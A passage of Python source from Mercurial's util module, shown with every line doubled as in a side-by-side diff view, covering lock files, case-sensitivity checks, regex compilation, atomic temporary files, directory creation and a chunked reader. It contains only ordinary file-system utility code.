1860 timer = time.perf_counter
1860 timer = time.perf_counter
1861
1861
1862 def makelock(info, pathname):
1862 def makelock(info, pathname):
1863 """Create a lock file atomically if possible
1863 """Create a lock file atomically if possible
1864
1864
1865 This may leave a stale lock file if symlink isn't supported and signal
1865 This may leave a stale lock file if symlink isn't supported and signal
1866 interrupt is enabled.
1866 interrupt is enabled.
1867 """
1867 """
1868 try:
1868 try:
1869 return os.symlink(info, pathname)
1869 return os.symlink(info, pathname)
1870 except OSError as why:
1870 except OSError as why:
1871 if why.errno == errno.EEXIST:
1871 if why.errno == errno.EEXIST:
1872 raise
1872 raise
1873 except AttributeError: # no symlink in os
1873 except AttributeError: # no symlink in os
1874 pass
1874 pass
1875
1875
1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1877 ld = os.open(pathname, flags)
1877 ld = os.open(pathname, flags)
1878 os.write(ld, info)
1878 os.write(ld, info)
1879 os.close(ld)
1879 os.close(ld)
1880
1880
1881 def readlock(pathname):
1881 def readlock(pathname):
1882 try:
1882 try:
1883 return readlink(pathname)
1883 return readlink(pathname)
1884 except OSError as why:
1884 except OSError as why:
1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1886 raise
1886 raise
1887 except AttributeError: # no symlink in os
1887 except AttributeError: # no symlink in os
1888 pass
1888 pass
1889 with posixfile(pathname, 'rb') as fp:
1889 with posixfile(pathname, 'rb') as fp:
1890 return fp.read()
1890 return fp.read()
1891
1891
1892 def fstat(fp):
1892 def fstat(fp):
1893 '''stat file object that may not have fileno method.'''
1893 '''stat file object that may not have fileno method.'''
1894 try:
1894 try:
1895 return os.fstat(fp.fileno())
1895 return os.fstat(fp.fileno())
1896 except AttributeError:
1896 except AttributeError:
1897 return os.stat(fp.name)
1897 return os.stat(fp.name)
1898
1898
1899 # File system features
1899 # File system features
1900
1900
1901 def fscasesensitive(path):
1901 def fscasesensitive(path):
1902 """
1902 """
1903 Return true if the given path is on a case-sensitive filesystem
1903 Return true if the given path is on a case-sensitive filesystem
1904
1904
1905 Requires a path (like /foo/.hg) ending with a foldable final
1905 Requires a path (like /foo/.hg) ending with a foldable final
1906 directory component.
1906 directory component.
1907 """
1907 """
1908 s1 = os.lstat(path)
1908 s1 = os.lstat(path)
1909 d, b = os.path.split(path)
1909 d, b = os.path.split(path)
1910 b2 = b.upper()
1910 b2 = b.upper()
1911 if b == b2:
1911 if b == b2:
1912 b2 = b.lower()
1912 b2 = b.lower()
1913 if b == b2:
1913 if b == b2:
1914 return True # no evidence against case sensitivity
1914 return True # no evidence against case sensitivity
1915 p2 = os.path.join(d, b2)
1915 p2 = os.path.join(d, b2)
1916 try:
1916 try:
1917 s2 = os.lstat(p2)
1917 s2 = os.lstat(p2)
1918 if s2 == s1:
1918 if s2 == s1:
1919 return False
1919 return False
1920 return True
1920 return True
1921 except OSError:
1921 except OSError:
1922 return True
1922 return True
1923
1923
1924 try:
1924 try:
1925 import re2
1925 import re2
1926 _re2 = None
1926 _re2 = None
1927 except ImportError:
1927 except ImportError:
1928 _re2 = False
1928 _re2 = False
1929
1929
1930 class _re(object):
1930 class _re(object):
1931 def _checkre2(self):
1931 def _checkre2(self):
1932 global _re2
1932 global _re2
1933 try:
1933 try:
1934 # check if match works, see issue3964
1934 # check if match works, see issue3964
1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1936 except ImportError:
1936 except ImportError:
1937 _re2 = False
1937 _re2 = False
1938
1938
1939 def compile(self, pat, flags=0):
1939 def compile(self, pat, flags=0):
1940 '''Compile a regular expression, using re2 if possible
1940 '''Compile a regular expression, using re2 if possible
1941
1941
1942 For best performance, use only re2-compatible regexp features. The
1942 For best performance, use only re2-compatible regexp features. The
1943 only flags from the re module that are re2-compatible are
1943 only flags from the re module that are re2-compatible are
1944 IGNORECASE and MULTILINE.'''
1944 IGNORECASE and MULTILINE.'''
1945 if _re2 is None:
1945 if _re2 is None:
1946 self._checkre2()
1946 self._checkre2()
1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1948 if flags & remod.IGNORECASE:
1948 if flags & remod.IGNORECASE:
1949 pat = '(?i)' + pat
1949 pat = '(?i)' + pat
1950 if flags & remod.MULTILINE:
1950 if flags & remod.MULTILINE:
1951 pat = '(?m)' + pat
1951 pat = '(?m)' + pat
1952 try:
1952 try:
1953 return re2.compile(pat)
1953 return re2.compile(pat)
1954 except re2.error:
1954 except re2.error:
1955 pass
1955 pass
1956 return remod.compile(pat, flags)
1956 return remod.compile(pat, flags)
1957
1957
1958 @propertycache
1958 @propertycache
1959 def escape(self):
1959 def escape(self):
1960 '''Return the version of escape corresponding to self.compile.
1960 '''Return the version of escape corresponding to self.compile.
1961
1961
1962 This is imperfect because whether re2 or re is used for a particular
1962 This is imperfect because whether re2 or re is used for a particular
1963 function depends on the flags, etc, but it's the best we can do.
1963 function depends on the flags, etc, but it's the best we can do.
1964 '''
1964 '''
1965 global _re2
1965 global _re2
1966 if _re2 is None:
1966 if _re2 is None:
1967 self._checkre2()
1967 self._checkre2()
1968 if _re2:
1968 if _re2:
1969 return re2.escape
1969 return re2.escape
1970 else:
1970 else:
1971 return remod.escape
1971 return remod.escape
1972
1972
1973 re = _re()
1973 re = _re()
1974
1974
1975 _fspathcache = {}
1975 _fspathcache = {}
1976 def fspath(name, root):
1976 def fspath(name, root):
1977 '''Get name in the case stored in the filesystem
1977 '''Get name in the case stored in the filesystem
1978
1978
1979 The name should be relative to root, and be normcase-ed for efficiency.
1979 The name should be relative to root, and be normcase-ed for efficiency.
1980
1980
1981 Note that this function is unnecessary, and should not be
1981 Note that this function is unnecessary, and should not be
1982 called, for case-sensitive filesystems (simply because it's expensive).
1982 called, for case-sensitive filesystems (simply because it's expensive).
1983
1983
1984 The root should be normcase-ed, too.
1984 The root should be normcase-ed, too.
1985 '''
1985 '''
1986 def _makefspathcacheentry(dir):
1986 def _makefspathcacheentry(dir):
1987 return dict((normcase(n), n) for n in os.listdir(dir))
1987 return dict((normcase(n), n) for n in os.listdir(dir))
1988
1988
1989 seps = pycompat.ossep
1989 seps = pycompat.ossep
1990 if pycompat.osaltsep:
1990 if pycompat.osaltsep:
1991 seps = seps + pycompat.osaltsep
1991 seps = seps + pycompat.osaltsep
1992 # Protect backslashes. This gets silly very quickly.
1992 # Protect backslashes. This gets silly very quickly.
1993 seps.replace('\\','\\\\')
1993 seps.replace('\\','\\\\')
1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1995 dir = os.path.normpath(root)
1995 dir = os.path.normpath(root)
1996 result = []
1996 result = []
1997 for part, sep in pattern.findall(name):
1997 for part, sep in pattern.findall(name):
1998 if sep:
1998 if sep:
1999 result.append(sep)
1999 result.append(sep)
2000 continue
2000 continue
2001
2001
2002 if dir not in _fspathcache:
2002 if dir not in _fspathcache:
2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2004 contents = _fspathcache[dir]
2004 contents = _fspathcache[dir]
2005
2005
2006 found = contents.get(part)
2006 found = contents.get(part)
2007 if not found:
2007 if not found:
2008 # retry "once per directory" per "dirstate.walk" which
2008 # retry "once per directory" per "dirstate.walk" which
2009 # may take place for each patches of "hg qpush", for example
2009 # may take place for each patches of "hg qpush", for example
2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2011 found = contents.get(part)
2011 found = contents.get(part)
2012
2012
2013 result.append(found or part)
2013 result.append(found or part)
2014 dir = os.path.join(dir, part)
2014 dir = os.path.join(dir, part)
2015
2015
2016 return ''.join(result)
2016 return ''.join(result)
2017
2017
2018 def checknlink(testfile):
2018 def checknlink(testfile):
2019 '''check whether hardlink count reporting works properly'''
2019 '''check whether hardlink count reporting works properly'''
2020
2020
2021 # testfile may be open, so we need a separate file for checking to
2021 # testfile may be open, so we need a separate file for checking to
2022 # work around issue2543 (or testfile may get lost on Samba shares)
2022 # work around issue2543 (or testfile may get lost on Samba shares)
2023 f1, f2, fp = None, None, None
2023 f1, f2, fp = None, None, None
2024 try:
2024 try:
2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2026 suffix='1~', dir=os.path.dirname(testfile))
2026 suffix='1~', dir=os.path.dirname(testfile))
2027 os.close(fd)
2027 os.close(fd)
2028 f2 = '%s2~' % f1[:-2]
2028 f2 = '%s2~' % f1[:-2]
2029
2029
2030 oslink(f1, f2)
2030 oslink(f1, f2)
2031 # nlinks() may behave differently for files on Windows shares if
2031 # nlinks() may behave differently for files on Windows shares if
2032 # the file is open.
2032 # the file is open.
2033 fp = posixfile(f2)
2033 fp = posixfile(f2)
2034 return nlinks(f2) > 1
2034 return nlinks(f2) > 1
2035 except OSError:
2035 except OSError:
2036 return False
2036 return False
2037 finally:
2037 finally:
2038 if fp is not None:
2038 if fp is not None:
2039 fp.close()
2039 fp.close()
2040 for f in (f1, f2):
2040 for f in (f1, f2):
2041 try:
2041 try:
2042 if f is not None:
2042 if f is not None:
2043 os.unlink(f)
2043 os.unlink(f)
2044 except OSError:
2044 except OSError:
2045 pass
2045 pass
2046
2046
2047 def endswithsep(path):
2047 def endswithsep(path):
2048 '''Check path ends with os.sep or os.altsep.'''
2048 '''Check path ends with os.sep or os.altsep.'''
2049 return (path.endswith(pycompat.ossep)
2049 return (path.endswith(pycompat.ossep)
2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2051
2051
2052 def splitpath(path):
2052 def splitpath(path):
2053 '''Split path by os.sep.
2053 '''Split path by os.sep.
2054 Note that this function does not use os.altsep because this is
2054 Note that this function does not use os.altsep because this is
2055 an alternative of simple "xxx.split(os.sep)".
2055 an alternative of simple "xxx.split(os.sep)".
2056 It is recommended to use os.path.normpath() before using this
2056 It is recommended to use os.path.normpath() before using this
2057 function if need.'''
2057 function if need.'''
2058 return path.split(pycompat.ossep)
2058 return path.split(pycompat.ossep)
2059
2059
2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2061 """Create a temporary file with the same contents from name
2061 """Create a temporary file with the same contents from name
2062
2062
2063 The permission bits are copied from the original file.
2063 The permission bits are copied from the original file.
2064
2064
2065 If the temporary file is going to be truncated immediately, you
2065 If the temporary file is going to be truncated immediately, you
2066 can use emptyok=True as an optimization.
2066 can use emptyok=True as an optimization.
2067
2067
2068 Returns the name of the temporary file.
2068 Returns the name of the temporary file.
2069 """
2069 """
2070 d, fn = os.path.split(name)
2070 d, fn = os.path.split(name)
2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2072 os.close(fd)
2072 os.close(fd)
2073 # Temporary files are created with mode 0600, which is usually not
2073 # Temporary files are created with mode 0600, which is usually not
2074 # what we want. If the original file already exists, just copy
2074 # what we want. If the original file already exists, just copy
2075 # its mode. Otherwise, manually obey umask.
2075 # its mode. Otherwise, manually obey umask.
2076 copymode(name, temp, createmode, enforcewritable)
2076 copymode(name, temp, createmode, enforcewritable)
2077
2077
2078 if emptyok:
2078 if emptyok:
2079 return temp
2079 return temp
2080 try:
2080 try:
2081 try:
2081 try:
2082 ifp = posixfile(name, "rb")
2082 ifp = posixfile(name, "rb")
2083 except IOError as inst:
2083 except IOError as inst:
2084 if inst.errno == errno.ENOENT:
2084 if inst.errno == errno.ENOENT:
2085 return temp
2085 return temp
2086 if not getattr(inst, 'filename', None):
2086 if not getattr(inst, 'filename', None):
2087 inst.filename = name
2087 inst.filename = name
2088 raise
2088 raise
2089 ofp = posixfile(temp, "wb")
2089 ofp = posixfile(temp, "wb")
2090 for chunk in filechunkiter(ifp):
2090 for chunk in filechunkiter(ifp):
2091 ofp.write(chunk)
2091 ofp.write(chunk)
2092 ifp.close()
2092 ifp.close()
2093 ofp.close()
2093 ofp.close()
2094 except: # re-raises
2094 except: # re-raises
2095 try:
2095 try:
2096 os.unlink(temp)
2096 os.unlink(temp)
2097 except OSError:
2097 except OSError:
2098 pass
2098 pass
2099 raise
2099 raise
2100 return temp
2100 return temp
2101
2101
2102 class filestat(object):
2102 class filestat(object):
2103 """help to exactly detect change of a file
2103 """help to exactly detect change of a file
2104
2104
2105 'stat' attribute is result of 'os.stat()' if specified 'path'
2105 'stat' attribute is result of 'os.stat()' if specified 'path'
2106 exists. Otherwise, it is None. This can avoid preparative
2106 exists. Otherwise, it is None. This can avoid preparative
2107 'exists()' examination on client side of this class.
2107 'exists()' examination on client side of this class.
2108 """
2108 """
2109 def __init__(self, stat):
2109 def __init__(self, stat):
2110 self.stat = stat
2110 self.stat = stat
2111
2111
2112 @classmethod
2112 @classmethod
2113 def frompath(cls, path):
2113 def frompath(cls, path):
2114 try:
2114 try:
2115 stat = os.stat(path)
2115 stat = os.stat(path)
2116 except OSError as err:
2116 except OSError as err:
2117 if err.errno != errno.ENOENT:
2117 if err.errno != errno.ENOENT:
2118 raise
2118 raise
2119 stat = None
2119 stat = None
2120 return cls(stat)
2120 return cls(stat)
2121
2121
2122 @classmethod
2122 @classmethod
2123 def fromfp(cls, fp):
2123 def fromfp(cls, fp):
2124 stat = os.fstat(fp.fileno())
2124 stat = os.fstat(fp.fileno())
2125 return cls(stat)
2125 return cls(stat)
2126
2126
2127 __hash__ = object.__hash__
2127 __hash__ = object.__hash__
2128
2128
2129 def __eq__(self, old):
2129 def __eq__(self, old):
2130 try:
2130 try:
2131 # if ambiguity between stat of new and old file is
2131 # if ambiguity between stat of new and old file is
2132 # avoided, comparison of size, ctime and mtime is enough
2132 # avoided, comparison of size, ctime and mtime is enough
2133 # to exactly detect change of a file regardless of platform
2133 # to exactly detect change of a file regardless of platform
2134 return (self.stat.st_size == old.stat.st_size and
2134 return (self.stat.st_size == old.stat.st_size and
2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2137 except AttributeError:
2137 except AttributeError:
2138 pass
2138 pass
2139 try:
2139 try:
2140 return self.stat is None and old.stat is None
2140 return self.stat is None and old.stat is None
2141 except AttributeError:
2141 except AttributeError:
2142 return False
2142 return False
2143
2143
2144 def isambig(self, old):
2144 def isambig(self, old):
2145 """Examine whether new (= self) stat is ambiguous against old one
2145 """Examine whether new (= self) stat is ambiguous against old one
2146
2146
2147 "S[N]" below means stat of a file at N-th change:
2147 "S[N]" below means stat of a file at N-th change:
2148
2148
2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2150 - S[n-1].ctime == S[n].ctime
2150 - S[n-1].ctime == S[n].ctime
2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2155
2155
2156 Case (*2) above means that a file was changed twice or more at
2156 Case (*2) above means that a file was changed twice or more at
2157 same time in sec (= S[n-1].ctime), and comparison of timestamp
2157 same time in sec (= S[n-1].ctime), and comparison of timestamp
2158 is ambiguous.
2158 is ambiguous.
2159
2159
2160 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2160 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2161 timestamp is ambiguous".
2161 timestamp is ambiguous".
2162
2162
2163 But advancing mtime only in case (*2) doesn't work as
2163 But advancing mtime only in case (*2) doesn't work as
2164 expected, because naturally advanced S[n].mtime in case (*1)
2164 expected, because naturally advanced S[n].mtime in case (*1)
2165 might be equal to manually advanced S[n-1 or earlier].mtime.
2165 might be equal to manually advanced S[n-1 or earlier].mtime.
2166
2166
2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2168 treated as ambiguous regardless of mtime, to avoid overlooking
2168 treated as ambiguous regardless of mtime, to avoid overlooking
2169 by confliction between such mtime.
2169 by confliction between such mtime.
2170
2170
2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2172 S[n].mtime", even if size of a file isn't changed.
2172 S[n].mtime", even if size of a file isn't changed.
2173 """
2173 """
2174 try:
2174 try:
2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2176 except AttributeError:
2176 except AttributeError:
2177 return False
2177 return False
2178
2178
2179 def avoidambig(self, path, old):
2179 def avoidambig(self, path, old):
2180 """Change file stat of specified path to avoid ambiguity
2180 """Change file stat of specified path to avoid ambiguity
2181
2181
2182 'old' should be previous filestat of 'path'.
2182 'old' should be previous filestat of 'path'.
2183
2183
2184 This skips avoiding ambiguity, if a process doesn't have
2184 This skips avoiding ambiguity, if a process doesn't have
2185 appropriate privileges for 'path'. This returns False in this
2185 appropriate privileges for 'path'. This returns False in this
2186 case.
2186 case.
2187
2187
2188 Otherwise, this returns True, as "ambiguity is avoided".
2188 Otherwise, this returns True, as "ambiguity is avoided".
2189 """
2189 """
2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2191 try:
2191 try:
2192 os.utime(path, (advanced, advanced))
2192 os.utime(path, (advanced, advanced))
2193 except OSError as inst:
2193 except OSError as inst:
2194 if inst.errno == errno.EPERM:
2194 if inst.errno == errno.EPERM:
2195 # utime() on the file created by another user causes EPERM,
2195 # utime() on the file created by another user causes EPERM,
2196 # if a process doesn't have appropriate privileges
2196 # if a process doesn't have appropriate privileges
2197 return False
2197 return False
2198 raise
2198 raise
2199 return True
2199 return True
2200
2200
2201 def __ne__(self, other):
2201 def __ne__(self, other):
2202 return not self == other
2202 return not self == other
2203
2203
2204 class atomictempfile(object):
2204 class atomictempfile(object):
2205 '''writable file object that atomically updates a file
2205 '''writable file object that atomically updates a file
2206
2206
2207 All writes will go to a temporary copy of the original file. Call
2207 All writes will go to a temporary copy of the original file. Call
2208 close() when you are done writing, and atomictempfile will rename
2208 close() when you are done writing, and atomictempfile will rename
2209 the temporary copy to the original name, making the changes
2209 the temporary copy to the original name, making the changes
2210 visible. If the object is destroyed without being closed, all your
2210 visible. If the object is destroyed without being closed, all your
2211 writes are discarded.
2211 writes are discarded.
2212
2212
2213 checkambig argument of constructor is used with filestat, and is
2213 checkambig argument of constructor is used with filestat, and is
2214 useful only if target file is guarded by any lock (e.g. repo.lock
2214 useful only if target file is guarded by any lock (e.g. repo.lock
2215 or repo.wlock).
2215 or repo.wlock).
2216 '''
2216 '''
2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2218 self.__name = name # permanent name
2218 self.__name = name # permanent name
2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2220 createmode=createmode,
2220 createmode=createmode,
2221 enforcewritable=('w' in mode))
2221 enforcewritable=('w' in mode))
2222
2222
2223 self._fp = posixfile(self._tempname, mode)
2223 self._fp = posixfile(self._tempname, mode)
2224 self._checkambig = checkambig
2224 self._checkambig = checkambig
2225
2225
2226 # delegated methods
2226 # delegated methods
2227 self.read = self._fp.read
2227 self.read = self._fp.read
2228 self.write = self._fp.write
2228 self.write = self._fp.write
2229 self.seek = self._fp.seek
2229 self.seek = self._fp.seek
2230 self.tell = self._fp.tell
2230 self.tell = self._fp.tell
2231 self.fileno = self._fp.fileno
2231 self.fileno = self._fp.fileno
2232
2232
2233 def close(self):
2233 def close(self):
2234 if not self._fp.closed:
2234 if not self._fp.closed:
2235 self._fp.close()
2235 self._fp.close()
2236 filename = localpath(self.__name)
2236 filename = localpath(self.__name)
2237 oldstat = self._checkambig and filestat.frompath(filename)
2237 oldstat = self._checkambig and filestat.frompath(filename)
2238 if oldstat and oldstat.stat:
2238 if oldstat and oldstat.stat:
2239 rename(self._tempname, filename)
2239 rename(self._tempname, filename)
2240 newstat = filestat.frompath(filename)
2240 newstat = filestat.frompath(filename)
2241 if newstat.isambig(oldstat):
2241 if newstat.isambig(oldstat):
2242 # stat of changed file is ambiguous to original one
2242 # stat of changed file is ambiguous to original one
2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2244 os.utime(filename, (advanced, advanced))
2244 os.utime(filename, (advanced, advanced))
2245 else:
2245 else:
2246 rename(self._tempname, filename)
2246 rename(self._tempname, filename)
2247
2247
2248 def discard(self):
2248 def discard(self):
2249 if not self._fp.closed:
2249 if not self._fp.closed:
2250 try:
2250 try:
2251 os.unlink(self._tempname)
2251 os.unlink(self._tempname)
2252 except OSError:
2252 except OSError:
2253 pass
2253 pass
2254 self._fp.close()
2254 self._fp.close()
2255
2255
2256 def __del__(self):
2256 def __del__(self):
2257 if safehasattr(self, '_fp'): # constructor actually did something
2257 if safehasattr(self, '_fp'): # constructor actually did something
2258 self.discard()
2258 self.discard()
2259
2259
2260 def __enter__(self):
2260 def __enter__(self):
2261 return self
2261 return self
2262
2262
2263 def __exit__(self, exctype, excvalue, traceback):
2263 def __exit__(self, exctype, excvalue, traceback):
2264 if exctype is not None:
2264 if exctype is not None:
2265 self.discard()
2265 self.discard()
2266 else:
2266 else:
2267 self.close()
2267 self.close()
2268
2268
2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2270 """unlink and remove the directory if it is empty"""
2270 """unlink and remove the directory if it is empty"""
2271 if ignoremissing:
2271 if ignoremissing:
2272 tryunlink(f)
2272 tryunlink(f)
2273 else:
2273 else:
2274 unlink(f)
2274 unlink(f)
2275 if rmdir:
2275 if rmdir:
2276 # try removing directories that might now be empty
2276 # try removing directories that might now be empty
2277 try:
2277 try:
2278 removedirs(os.path.dirname(f))
2278 removedirs(os.path.dirname(f))
2279 except OSError:
2279 except OSError:
2280 pass
2280 pass
2281
2281
2282 def tryunlink(f):
2282 def tryunlink(f):
2283 """Attempt to remove a file, ignoring ENOENT errors."""
2283 """Attempt to remove a file, ignoring ENOENT errors."""
2284 try:
2284 try:
2285 unlink(f)
2285 unlink(f)
2286 except OSError as e:
2286 except OSError as e:
2287 if e.errno != errno.ENOENT:
2287 if e.errno != errno.ENOENT:
2288 raise
2288 raise
2289
2289
2290 def makedirs(name, mode=None, notindexed=False):
2290 def makedirs(name, mode=None, notindexed=False):
2291 """recursive directory creation with parent mode inheritance
2291 """recursive directory creation with parent mode inheritance
2292
2292
2293 Newly created directories are marked as "not to be indexed by
2293 Newly created directories are marked as "not to be indexed by
2294 the content indexing service", if ``notindexed`` is specified
2294 the content indexing service", if ``notindexed`` is specified
2295 for "write" mode access.
2295 for "write" mode access.
2296 """
2296 """
2297 try:
2297 try:
2298 makedir(name, notindexed)
2298 makedir(name, notindexed)
2299 except OSError as err:
2299 except OSError as err:
2300 if err.errno == errno.EEXIST:
2300 if err.errno == errno.EEXIST:
2301 return
2301 return
2302 if err.errno != errno.ENOENT or not name:
2302 if err.errno != errno.ENOENT or not name:
2303 raise
2303 raise
2304 parent = os.path.dirname(os.path.abspath(name))
2304 parent = os.path.dirname(os.path.abspath(name))
2305 if parent == name:
2305 if parent == name:
2306 raise
2306 raise
2307 makedirs(parent, mode, notindexed)
2307 makedirs(parent, mode, notindexed)
2308 try:
2308 try:
2309 makedir(name, notindexed)
2309 makedir(name, notindexed)
2310 except OSError as err:
2310 except OSError as err:
2311 # Catch EEXIST to handle races
2311 # Catch EEXIST to handle races
2312 if err.errno == errno.EEXIST:
2312 if err.errno == errno.EEXIST:
2313 return
2313 return
2314 raise
2314 raise
2315 if mode is not None:
2315 if mode is not None:
2316 os.chmod(name, mode)
2316 os.chmod(name, mode)
2317
2317
2318 def readfile(path):
2318 def readfile(path):
2319 with open(path, 'rb') as fp:
2319 with open(path, 'rb') as fp:
2320 return fp.read()
2320 return fp.read()
2321
2321
2322 def writefile(path, text):
2322 def writefile(path, text):
2323 with open(path, 'wb') as fp:
2323 with open(path, 'wb') as fp:
2324 fp.write(text)
2324 fp.write(text)
2325
2325
2326 def appendfile(path, text):
2326 def appendfile(path, text):
2327 with open(path, 'ab') as fp:
2327 with open(path, 'ab') as fp:
2328 fp.write(text)
2328 fp.write(text)
2329
2329
2330 class chunkbuffer(object):
2330 class chunkbuffer(object):
2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2332 iterator over chunks of arbitrary size."""
2332 iterator over chunks of arbitrary size."""
2333
2333
2334 def __init__(self, in_iter):
2334 def __init__(self, in_iter):
2335 """in_iter is the iterator that's iterating over the input chunks."""
2335 """in_iter is the iterator that's iterating over the input chunks."""
2336 def splitbig(chunks):
2336 def splitbig(chunks):
2337 for chunk in chunks:
2337 for chunk in chunks:
2338 if len(chunk) > 2**20:
2338 if len(chunk) > 2**20:
2339 pos = 0
2339 pos = 0
2340 while pos < len(chunk):
2340 while pos < len(chunk):
2341 end = pos + 2 ** 18
2341 end = pos + 2 ** 18
2342 yield chunk[pos:end]
2342 yield chunk[pos:end]
2343 pos = end
2343 pos = end
2344 else:
2344 else:
2345 yield chunk
2345 yield chunk
2346 self.iter = splitbig(in_iter)
2346 self.iter = splitbig(in_iter)
2347 self._queue = collections.deque()
2347 self._queue = collections.deque()
2348 self._chunkoffset = 0
2348 self._chunkoffset = 0
2349
2349
2350 def read(self, l=None):
2350 def read(self, l=None):
2351 """Read L bytes of data from the iterator of chunks of data.
2351 """Read L bytes of data from the iterator of chunks of data.
2352 Returns less than L bytes if the iterator runs dry.
2352 Returns less than L bytes if the iterator runs dry.
2353
2353
2354 If size parameter is omitted, read everything"""
2354 If size parameter is omitted, read everything"""
2355 if l is None:
2355 if l is None:
2356 return ''.join(self.iter)
2356 return ''.join(self.iter)
2357
2357
2358 left = l
2358 left = l
2359 buf = []
2359 buf = []
2360 queue = self._queue
2360 queue = self._queue
2361 while left > 0:
2361 while left > 0:
2362 # refill the queue
2362 # refill the queue
2363 if not queue:
2363 if not queue:
2364 target = 2**18
2364 target = 2**18
2365 for chunk in self.iter:
2365 for chunk in self.iter:
2366 queue.append(chunk)
2366 queue.append(chunk)
2367 target -= len(chunk)
2367 target -= len(chunk)
2368 if target <= 0:
2368 if target <= 0:
2369 break
2369 break
2370 if not queue:
2370 if not queue:
2371 break
2371 break
2372
2372
2373 # The easy way to do this would be to queue.popleft(), modify the
2373 # The easy way to do this would be to queue.popleft(), modify the
2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2375 # where we read partial chunk content, this incurs 2 dequeue
2375 # where we read partial chunk content, this incurs 2 dequeue
2376 # mutations and creates a new str for the remaining chunk in the
2376 # mutations and creates a new str for the remaining chunk in the
2377 # queue. Our code below avoids this overhead.
2377 # queue. Our code below avoids this overhead.
2378
2378
2379 chunk = queue[0]
2379 chunk = queue[0]
2380 chunkl = len(chunk)
2380 chunkl = len(chunk)
2381 offset = self._chunkoffset
2381 offset = self._chunkoffset
2382
2382
2383 # Use full chunk.
2383 # Use full chunk.
2384 if offset == 0 and left >= chunkl:
2384 if offset == 0 and left >= chunkl:
2385 left -= chunkl
2385 left -= chunkl
2386 queue.popleft()
2386 queue.popleft()
2387 buf.append(chunk)
2387 buf.append(chunk)
2388 # self._chunkoffset remains at 0.
2388 # self._chunkoffset remains at 0.
2389 continue
2389 continue
2390
2390
2391 chunkremaining = chunkl - offset
2391 chunkremaining = chunkl - offset
2392
2392
2393 # Use all of unconsumed part of chunk.
2393 # Use all of unconsumed part of chunk.
2394 if left >= chunkremaining:
2394 if left >= chunkremaining:
2395 left -= chunkremaining
2395 left -= chunkremaining
2396 queue.popleft()
2396 queue.popleft()
2397 # offset == 0 is enabled by block above, so this won't merely
2397 # offset == 0 is enabled by block above, so this won't merely
2398 # copy via ``chunk[0:]``.
2398 # copy via ``chunk[0:]``.
2399 buf.append(chunk[offset:])
2399 buf.append(chunk[offset:])
2400 self._chunkoffset = 0
2400 self._chunkoffset = 0
2401
2401
2402 # Partial chunk needed.
2402 # Partial chunk needed.
2403 else:
2403 else:
2404 buf.append(chunk[offset:offset + left])
2404 buf.append(chunk[offset:offset + left])
2405 self._chunkoffset += left
2405 self._chunkoffset += left
2406 left -= chunkremaining
2406 left -= chunkremaining
